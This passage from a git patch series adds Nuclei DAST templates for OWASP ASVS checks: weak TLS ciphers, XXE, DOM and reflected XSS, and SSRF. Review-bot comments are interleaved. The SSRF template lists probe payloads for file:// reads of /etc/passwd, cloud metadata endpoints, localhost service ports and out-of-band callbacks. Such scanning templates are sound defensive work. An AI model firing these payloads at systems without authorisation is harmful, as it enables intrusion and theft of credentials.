"TLS_DH_anon_WITH_AES_256_GCM_SHA384" + - "TLS_RSA_WITH_NULL_SHA256" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_SHA" + - "TLS_RSA_WITH_DES_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHA" + - "TLS_PSK_WITH_NULL_SHA384" + - "TLS_DH_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_RC4_128_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA" + - "TLS_DHE_PSK_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_ARIA_256_CBC_SHA384" + - "TLS_DH_anon_WITH_DES_CBC_SHA" + - "TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_SEED_CBC_SHA" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA256" + - "TLS_DHE_DSS_WITH_DES_CBC_SHA" + - "TLS_PSK_WITH_NULL_SHA256" + - "TLS_ECDH_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_AES_128_CBC_SHA" + - "TLS_ECDHE_PSK_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_AES_256_CBC_SHA" + - "TLS_KRB5_WITH_IDEA_CBC_MD5" + - "TLS_GOSTR341112_256_WITH_KUZNYECHIK_CTR_OMAC" + - "TLS_ECDHE_RSA_WITH_NULL_SHA" + - "TLS_GOSTR341112_256_WITH_28147_CNT_IMIT" + - "TLS_RSA_PSK_WITH_NULL_SHA" + - "TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_DES_CBC_MD5" + - "TLS_KRB5_EXPORT_WITH_RC4_40_SHA" + - "TLS_DH_anon_WITH_ARIA_128_GCM_SHA256" + - "TLS_SM4_GCM_SM3" + - "TLS_ECDHE_PSK_WITH_NULL_SHA384" + - "TLS_ECDHE_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_NULL_SHA256" + - "TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_RSA_WITH_DES_CBC_SHA" + - "TLS_ECDHE_RSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_RC4_128_SHA" + - "TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DHE_RSA_WITH_DES_CBC_SHA" + - "TLS_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA256" + - "TLS_DH_anon_WITH_CAMELLIA_128_GCM_SHA256" + - "TLS_ECDH_ECDSA_WITH_NULL_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA384" + - "TLS_KRB5_WITH_3DES_EDE_CBC_MD5" + - "TLS_KRB5_WITH_RC4_128_SHA" + - 
"TLS_RSA_WITH_NULL_SHA" + condition: or + + - address: "{{Host}}:{{Port}}" + min_version: tls11 + max_version: tls11 + + extractors: + - type: dsl + dsl: + - "tls_version, cipher" + matchers: + - type: word + part: cipher + words: + - "TLS_DHE_PSK_WITH_NULL_SHA384" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA" + - "TLS_DH_anon_WITH_AES_128_GCM_SHA256" + - "TLS_NULL_WITH_NULL_NULL" + - "TLS_DH_DSS_WITH_DES_CBC_SHA" + - "TLS_ECDH_RSA_WITH_NULL_SHA" + - "TLS_DH_anon_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_128_CBC_SHA256" + - "TLS_RSA_WITH_RC4_128_MD5" + - "TLS_SM4_CCM_SM3" + - "TLS_DH_anon_WITH_CAMELLIA_256_GCM_SHA384" + - "TLS_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_ECDH_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5" + - "TLS_RSA_PSK_WITH_RC4_128_SHA" + - "TLS_GOSTR341112_256_WITH_MAGMA_CTR_OMAC" + - "TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_256_GCM_SHA384" + - "TLS_DHE_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_RC4_128_SHA" + - "TLS_PSK_WITH_RC4_128_SHA" + - "TLS_DHE_PSK_WITH_RC4_128_SHA" + - "TLS_KRB5_WITH_DES_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA256" + - "TLS_PSK_WITH_NULL_SHA" + - "TLS_RSA_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_RC4_128_MD5" + - "TLS_ECDHE_ECDSA_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA256" + - "TLS_RSA_WITH_NULL_MD5" + - "TLS_SHA384_SHA384" + - "TLS_SHA256_SHA256" + - "TLS_DH_anon_WITH_AES_256_GCM_SHA384" + - "TLS_RSA_WITH_NULL_SHA256" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_SHA" + - "TLS_RSA_WITH_DES_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHA" + - "TLS_PSK_WITH_NULL_SHA384" + - "TLS_DH_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_RC4_128_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA" + - "TLS_DHE_PSK_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_ARIA_256_CBC_SHA384" + - "TLS_DH_anon_WITH_DES_CBC_SHA" + - "TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA" + - 
"TLS_DH_anon_WITH_SEED_CBC_SHA" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA256" + - "TLS_DHE_DSS_WITH_DES_CBC_SHA" + - "TLS_PSK_WITH_NULL_SHA256" + - "TLS_ECDH_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_AES_128_CBC_SHA" + - "TLS_ECDHE_PSK_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_AES_256_CBC_SHA" + - "TLS_KRB5_WITH_IDEA_CBC_MD5" + - "TLS_GOSTR341112_256_WITH_KUZNYECHIK_CTR_OMAC" + - "TLS_ECDHE_RSA_WITH_NULL_SHA" + - "TLS_GOSTR341112_256_WITH_28147_CNT_IMIT" + - "TLS_RSA_PSK_WITH_NULL_SHA" + - "TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_DES_CBC_MD5" + - "TLS_KRB5_EXPORT_WITH_RC4_40_SHA" + - "TLS_DH_anon_WITH_ARIA_128_GCM_SHA256" + - "TLS_SM4_GCM_SM3" + - "TLS_ECDHE_PSK_WITH_NULL_SHA384" + - "TLS_ECDHE_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_NULL_SHA256" + - "TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_RSA_WITH_DES_CBC_SHA" + - "TLS_ECDHE_RSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_RC4_128_SHA" + - "TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DHE_RSA_WITH_DES_CBC_SHA" + - "TLS_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA256" + - "TLS_DH_anon_WITH_CAMELLIA_128_GCM_SHA256" + - "TLS_ECDH_ECDSA_WITH_NULL_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA384" + - "TLS_KRB5_WITH_3DES_EDE_CBC_MD5" + - "TLS_KRB5_WITH_RC4_128_SHA" + - "TLS_RSA_WITH_NULL_SHA" + condition: or + + - address: "{{Host}}:{{Port}}" + min_version: tls12 + max_version: tls12 + + extractors: + - type: dsl + dsl: + - "tls_version, cipher" + matchers: + - type: word + part: cipher + words: + - "TLS_DHE_PSK_WITH_NULL_SHA384" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA" + - "TLS_DH_anon_WITH_AES_128_GCM_SHA256" + - "TLS_NULL_WITH_NULL_NULL" + - "TLS_DH_DSS_WITH_DES_CBC_SHA" + - "TLS_ECDH_RSA_WITH_NULL_SHA" + - "TLS_DH_anon_EXPORT_WITH_RC4_40_MD5" + - 
"TLS_DH_anon_WITH_AES_256_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_128_CBC_SHA256" + - "TLS_RSA_WITH_RC4_128_MD5" + - "TLS_SM4_CCM_SM3" + - "TLS_DH_anon_WITH_CAMELLIA_256_GCM_SHA384" + - "TLS_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_ECDH_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5" + - "TLS_RSA_PSK_WITH_RC4_128_SHA" + - "TLS_GOSTR341112_256_WITH_MAGMA_CTR_OMAC" + - "TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_256_GCM_SHA384" + - "TLS_DHE_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_RC4_128_SHA" + - "TLS_PSK_WITH_RC4_128_SHA" + - "TLS_DHE_PSK_WITH_RC4_128_SHA" + - "TLS_KRB5_WITH_DES_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA256" + - "TLS_PSK_WITH_NULL_SHA" + - "TLS_RSA_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_RC4_128_MD5" + - "TLS_ECDHE_ECDSA_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA256" + - "TLS_RSA_WITH_NULL_MD5" + - "TLS_SHA384_SHA384" + - "TLS_SHA256_SHA256" + - "TLS_DH_anon_WITH_AES_256_GCM_SHA384" + - "TLS_RSA_WITH_NULL_SHA256" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_SHA" + - "TLS_RSA_WITH_DES_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHA" + - "TLS_PSK_WITH_NULL_SHA384" + - "TLS_DH_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_RC4_128_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA" + - "TLS_DHE_PSK_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_ARIA_256_CBC_SHA384" + - "TLS_DH_anon_WITH_DES_CBC_SHA" + - "TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_SEED_CBC_SHA" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA256" + - "TLS_DHE_DSS_WITH_DES_CBC_SHA" + - "TLS_PSK_WITH_NULL_SHA256" + - "TLS_ECDH_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_AES_128_CBC_SHA" + - "TLS_ECDHE_PSK_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_AES_256_CBC_SHA" + - "TLS_KRB5_WITH_IDEA_CBC_MD5" + - "TLS_GOSTR341112_256_WITH_KUZNYECHIK_CTR_OMAC" + - "TLS_ECDHE_RSA_WITH_NULL_SHA" + - "TLS_GOSTR341112_256_WITH_28147_CNT_IMIT" + - "TLS_RSA_PSK_WITH_NULL_SHA" 
+ - "TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_DES_CBC_MD5" + - "TLS_KRB5_EXPORT_WITH_RC4_40_SHA" + - "TLS_DH_anon_WITH_ARIA_128_GCM_SHA256" + - "TLS_SM4_GCM_SM3" + - "TLS_ECDHE_PSK_WITH_NULL_SHA384" + - "TLS_ECDHE_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_NULL_SHA256" + - "TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_RSA_WITH_DES_CBC_SHA" + - "TLS_ECDHE_RSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_RC4_128_SHA" + - "TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DHE_RSA_WITH_DES_CBC_SHA" + - "TLS_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA256" + - "TLS_DH_anon_WITH_CAMELLIA_128_GCM_SHA256" + - "TLS_ECDH_ECDSA_WITH_NULL_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA384" + - "TLS_KRB5_WITH_3DES_EDE_CBC_MD5" + - "TLS_KRB5_WITH_RC4_128_SHA" + - "TLS_RSA_WITH_NULL_SHA" + condition: or + + - address: "{{Host}}:{{Port}}" + min_version: tls13 + max_version: tls13 + + extractors: + - type: dsl + dsl: + - "tls_version, cipher" + matchers: + - type: word + part: cipher + words: + - "TLS_DHE_PSK_WITH_NULL_SHA384" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA" + - "TLS_DH_anon_WITH_AES_128_GCM_SHA256" + - "TLS_NULL_WITH_NULL_NULL" + - "TLS_DH_DSS_WITH_DES_CBC_SHA" + - "TLS_ECDH_RSA_WITH_NULL_SHA" + - "TLS_DH_anon_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_128_CBC_SHA256" + - "TLS_RSA_WITH_RC4_128_MD5" + - "TLS_SM4_CCM_SM3" + - "TLS_DH_anon_WITH_CAMELLIA_256_GCM_SHA384" + - "TLS_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_ECDH_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5" + - "TLS_RSA_PSK_WITH_RC4_128_SHA" + - "TLS_GOSTR341112_256_WITH_MAGMA_CTR_OMAC" + - "TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_256_GCM_SHA384" + - "TLS_DHE_PSK_WITH_NULL_SHA256" + - 
"TLS_ECDHE_PSK_WITH_RC4_128_SHA" + - "TLS_PSK_WITH_RC4_128_SHA" + - "TLS_DHE_PSK_WITH_RC4_128_SHA" + - "TLS_KRB5_WITH_DES_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA256" + - "TLS_PSK_WITH_NULL_SHA" + - "TLS_RSA_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_RC4_128_MD5" + - "TLS_ECDHE_ECDSA_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA256" + - "TLS_RSA_WITH_NULL_MD5" + - "TLS_SHA384_SHA384" + - "TLS_SHA256_SHA256" + - "TLS_DH_anon_WITH_AES_256_GCM_SHA384" + - "TLS_RSA_WITH_NULL_SHA256" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_SHA" + - "TLS_RSA_WITH_DES_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHA" + - "TLS_PSK_WITH_NULL_SHA384" + - "TLS_DH_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_RC4_128_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA" + - "TLS_DHE_PSK_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_ARIA_256_CBC_SHA384" + - "TLS_DH_anon_WITH_DES_CBC_SHA" + - "TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_SEED_CBC_SHA" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA256" + - "TLS_DHE_DSS_WITH_DES_CBC_SHA" + - "TLS_PSK_WITH_NULL_SHA256" + - "TLS_ECDH_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_AES_128_CBC_SHA" + - "TLS_ECDHE_PSK_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_AES_256_CBC_SHA" + - "TLS_KRB5_WITH_IDEA_CBC_MD5" + - "TLS_GOSTR341112_256_WITH_KUZNYECHIK_CTR_OMAC" + - "TLS_ECDHE_RSA_WITH_NULL_SHA" + - "TLS_GOSTR341112_256_WITH_28147_CNT_IMIT" + - "TLS_RSA_PSK_WITH_NULL_SHA" + - "TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_DES_CBC_MD5" + - "TLS_KRB5_EXPORT_WITH_RC4_40_SHA" + - "TLS_DH_anon_WITH_ARIA_128_GCM_SHA256" + - "TLS_SM4_GCM_SM3" + - "TLS_ECDHE_PSK_WITH_NULL_SHA384" + - "TLS_ECDHE_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_NULL_SHA256" + - "TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5" + - 
"TLS_DH_RSA_WITH_DES_CBC_SHA" + - "TLS_ECDHE_RSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_RC4_128_SHA" + - "TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DHE_RSA_WITH_DES_CBC_SHA" + - "TLS_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA256" + - "TLS_DH_anon_WITH_CAMELLIA_128_GCM_SHA256" + - "TLS_ECDH_ECDSA_WITH_NULL_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA384" + - "TLS_KRB5_WITH_3DES_EDE_CBC_MD5" + - "TLS_KRB5_WITH_RC4_128_SHA" + - "TLS_RSA_WITH_NULL_SHA" + condition: or \ No newline at end of file From 02fe5750c4162b1b470aa73d4ba41777d55fc96e Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Tue, 23 Jul 2024 08:16:16 +0000 Subject: [PATCH 106/129] Create 5.5.2.yaml --- templates/dast/5.5.2.yaml | 62 +++++++++++++++++++++++++++++++++++++++ 1 file changed, 62 insertions(+) create mode 100644 templates/dast/5.5.2.yaml diff --git a/templates/dast/5.5.2.yaml b/templates/dast/5.5.2.yaml new file mode 100644 index 0000000..41cf1ee --- /dev/null +++ b/templates/dast/5.5.2.yaml 
@@ -0,0 +1,62 @@ +id: ASVS-4-0-3-V5-5-2 + +info: + name: ASVS 5.5.2 Check + author: AmirHossein Raeisi + severity: High + classification: + cwe-id: CWE-611 + reference: + - https://github.com/andresriancho/w3af/blob/master/w3af/plugins/audit/xxe.py + - https://github.com/projectdiscovery/nuclei-templates/blob/main/dast/vulnerabilities/xxe/generic-xxe.yaml + - https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/07-Testing_for_XML_Injection + tags: asvs,12.6.1 + description: | + Verify that the application correctly restricts XML parsers to only use the most restrictive configuration possible and to ensure that unsafe features such as resolving external entities are disabled to prevent XML eXternal Entity (XXE) attacks. + +variables: + rletter: "{{rand_base(6,'abc')}}" + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + xxe: + - ' ]>&{{rletter}};' + - ' ]>&{{rletter}};' + - ' ]>&{{rletter}};' + + fuzzing: + - part: query + keys-regex: + - "(.*?)xml(.*?)" + fuzz: + - "{{xxe}}" + + - part: query + values: + - "(" + fuzz: + - "{{xxe}}" + + stop-at-first-match: true + matchers: + - type: regex + name: linux + part: body + regex: + - 'root:.*?:[0-9]*:[0-9]*:' + + - type: word + name: windows + part: body + words: + - 'for 16-bit app support' + + - type: word + part: interactsh_protocol + words: + - "http" \ No newline at end of file From 0d7b739fe5cd94fb930f115a6284cbfb9ee5aa8b Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Tue, 30 Jul 2024 13:02:22 +0000 Subject: [PATCH 107/129] Add 5.3.3.1.yaml --- templates/dast/5.3.3.1.yaml | 54 +++++++++++++++++++++++++++++++++++++ 1 file changed, 54 insertions(+) create mode 100644 templates/dast/5.3.3.1.yaml diff --git a/templates/dast/5.3.3.1.yaml b/templates/dast/5.3.3.1.yaml new file mode 100644 index 0000000..f3fb1a5 --- /dev/null +++ b/templates/dast/5.3.3.1.yaml 
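Review bot: `tags: asvs,12.6.1` in templates/dast/5.5.2.yaml does not match the template's id `ASVS-4-0-3-V5-5-2`; every other template tags its own requirement number, so `-tags 5.5.2` would skip this check and a 12.6.1 run would pick up an XXE test by mistake. Change it to `asvs,5.5.2`. `severity: High` should be lowercase `high` for consistency. The `linux` regex `root:.*?:[0-9]*:[0-9]*:` is unanchored and lazy, so any `root:` followed later by two colon-delimited digit runs matches; `root:[^:\r\n]*:0:0:` pins it to the actual passwd line for uid 0. The third matcher (`interactsh_protocol`) is the only unnamed one; naming it (e.g. `oob`) keeps the report consistent with `linux` and `windows`.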
@@ -0,0 +1,54 @@ +id: ASVS-4-0-3-V5-3-3-1 + +info: + name: ASVS 5.3.3.1 (Dom-based XSS) Check + author: AmirHossein Raeisi + severity: medium + classification: + cwe-id: CWE-79 + reference: + - https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_DOM-based_Cross_Site_Scripting + - https://snbig.github.io/Vulnerable-Pages/ASVS_5_3_3/ + - https://github.com/projectdiscovery/nuclei-templates/blob/main/dast/vulnerabilities/xss/dom-xss.yaml + tags: asvs,5.3.3 + description: | + Verify that context-aware, preferably automated - or at worst, manual - output escaping protects against reflected, stored, and DOM based XSS. ([C4](https://owasp.org/www-project-proactive-controls/#div-numbering)) + +variables: + num: "{{rand_int(10000, 99999)}}" +headless: + - steps: + - action: navigate + args: + url: "{{BaseURL}}" + + - action: waitload + payloads: + reflection: + - "'\">

{{num}}

" + + fuzzing: + - part: query + type: postfix + mode: single + fuzz: + - "{{reflection}}" + + - part: path + type: postfix + mode: single + fuzz: + - "{{reflection}}" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "

{{num}}

" + + - type: word + part: header + words: + - "text/html" \ No newline at end of file From 1287954afa27c2f8e297efe62aa6a9fa9f831f51 Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Wed, 21 Aug 2024 15:23:08 +0000 Subject: [PATCH 108/129] Create 5.3.3.2.yaml --- templates/dast/5.3.3.2.yaml | 56 +++++++++++++++++++++++++++++++++++++ 1 file changed, 56 insertions(+) create mode 100644 templates/dast/5.3.3.2.yaml diff --git a/templates/dast/5.3.3.2.yaml b/templates/dast/5.3.3.2.yaml new file mode 100644 index 0000000..fd92174 --- /dev/null +++ b/templates/dast/5.3.3.2.yaml 
@@ -0,0 +1,56 @@ +id: ASVS-4-0-3-V5-3-3-2 + +info: + name: ASVS 5.3.3.2 (Reflected XSS) Check + author: AmirHossein Raeisi + severity: medium + classification: + cwe-id: CWE-79 + reference: + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/01-Testing_for_Reflected_Cross_Site_Scripting + - https://snbig.github.io/Vulnerable-Pages/ASVS_5_3_3/ + - https://github.com/projectdiscovery/nuclei-templates/blob/main/dast/vulnerabilities/xss/reflected-xss.yaml +tags: asvs,5.3.3 +description: | + Verify that context-aware, preferably automated - or at worst, manual - output escaping protects against reflected, stored, and DOM based XSS. ([C4](https://owasp.org/www-project-proactive-controls/#div-numbering)) + +variables: + first: "{{rand_int(10000, 99999)}}" + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + reflection: + - "'\"><{{first}}>" + - "'><{{first}}>" + - "\"><{{first}}>" + + fuzzing: + - part: query + type: postfix + mode: single + fuzz: + - "{{reflection}}" + + - part: path + type: postfix + mode: single + fuzz: + - "{{reflection}}" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{reflection}}" + + - type: word + part: header + words: + - "text/html" \ No newline at end of file From 07d87a68b934ca6fb2db262b6ce5827f06a402a1 Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Sun, 25 Aug 2024 17:56:24 +0000 Subject: [PATCH 109/129] Update 5.3.3.1.yaml --- templates/{dast => headless}/5.3.3.1.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename templates/{dast => headless}/5.3.3.1.yaml (100%) diff --git a/templates/dast/5.3.3.1.yaml b/templates/headless/5.3.3.1.yaml similarity index 100% rename from templates/dast/5.3.3.1.yaml rename to templates/headless/5.3.3.1.yaml 
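Review bot: `tags:` and `description:` in templates/dast/5.3.3.2.yaml sit at column 0, which takes them out of the `info:` map and makes them top-level keys; the template then has no tags for `-tags asvs` filtering and no description in reports. Indent both by two spaces, as 5.3.3.1.yaml does. The matchers themselves read correctly: requiring the raw `{{reflection}}` string in a `text/html` body means an encoded reflection (`&lt;12345&gt;`) does not match, which is the behaviour wanted for an output-escaping check.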
From bddd39cb956b5c0c5f3f1071bd307820e1f94acb Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Sun, 25 Aug 2024 18:08:41 +0000 Subject: [PATCH 110/129] Create 5.2.6.yaml & Update 5.5.2.yaml --- templates/dast/5.2.6.yaml | 107 ++++++++++++++++++++++++++++++++++++++ templates/dast/5.5.2.yaml | 2 +- 2 files changed, 108 insertions(+), 1 deletion(-) create mode 100644 templates/dast/5.2.6.yaml diff --git a/templates/dast/5.2.6.yaml b/templates/dast/5.2.6.yaml new file mode 100644 index 0000000..8eba52c --- /dev/null +++ b/templates/dast/5.2.6.yaml 
@@ -0,0 +1,107 @@ +id: id: ASVS-4-0-3-V5-2-6 + +info: + name: ASVS 5.2.6 Check + author: AmirHossein Raeisi + severity: high + classification: + cwe-id: CWE-918 + reference: + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Server-Side_Request_Forgery + - https://snbig.github.io/Vulnerable-Pages/ASVS_12_6_1/ + - https://github.com/projectdiscovery/nuclei-templates/blob/main/dast/vulnerabilities/ssrf/response-ssrf.yaml + tags: asvs,5.2.6 + description: | + Verify that the application protects against SSRF attacks, by validating or sanitizing untrusted data or HTTP file metadata, such as filenames and URL input fields, and uses allow lists of protocols, domains, paths and ports. + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + ssrf: + - 'http://{{interactsh-url}}' + - 'http://{{FQDN}}.{{interactsh-url}}' + - 'http://{{FQDN}}@{{interactsh-url}}' + - 'http://{{interactsh-url}}#{{FQDN}}' + - 'http://{{RDN}}.{{interactsh-url}}' + - 'http://{{RDN}}@{{interactsh-url}}' + - 'http://{{interactsh-url}}#{{RDN}}' + - 'file:////./etc/./passwd' + - 'file:///c:/./windows/./win.ini' + - 'http://metadata.tencentyun.com/latest/meta-data/' + - 'http://100.100.100.200/latest/meta-data/' + - 'http://169.254.169.254/latest/meta-data/' + - 'http://169.254.169.254/metadata/v1' + - 'http://127.0.0.1:22' + - 'http://127.0.0.1:3306' + - 'dict://127.0.0.1:6379/info' + + fuzzing: + - part: query + mode: single + fuzz: + - "{{ssrf}}" + + - part: query + mode: single + values: + - "(https|http|file)(%3A%2F%2F|://)(.*?)" + fuzz: + - "{{ssrf}}" + + stop-at-first-match: true + matchers-condition: or + matchers: + + - type: word + part: body + words: + - "Interactsh Server" + + - type: regex + part: body + regex: + - 'SSH-(\d.\d)-OpenSSH_(\d.\d)' + + - type: regex + part: body + regex: + - '(DENIED Redis|CONFIG REWRITE|NOAUTH Authentication)' + + - type: regex + part: 
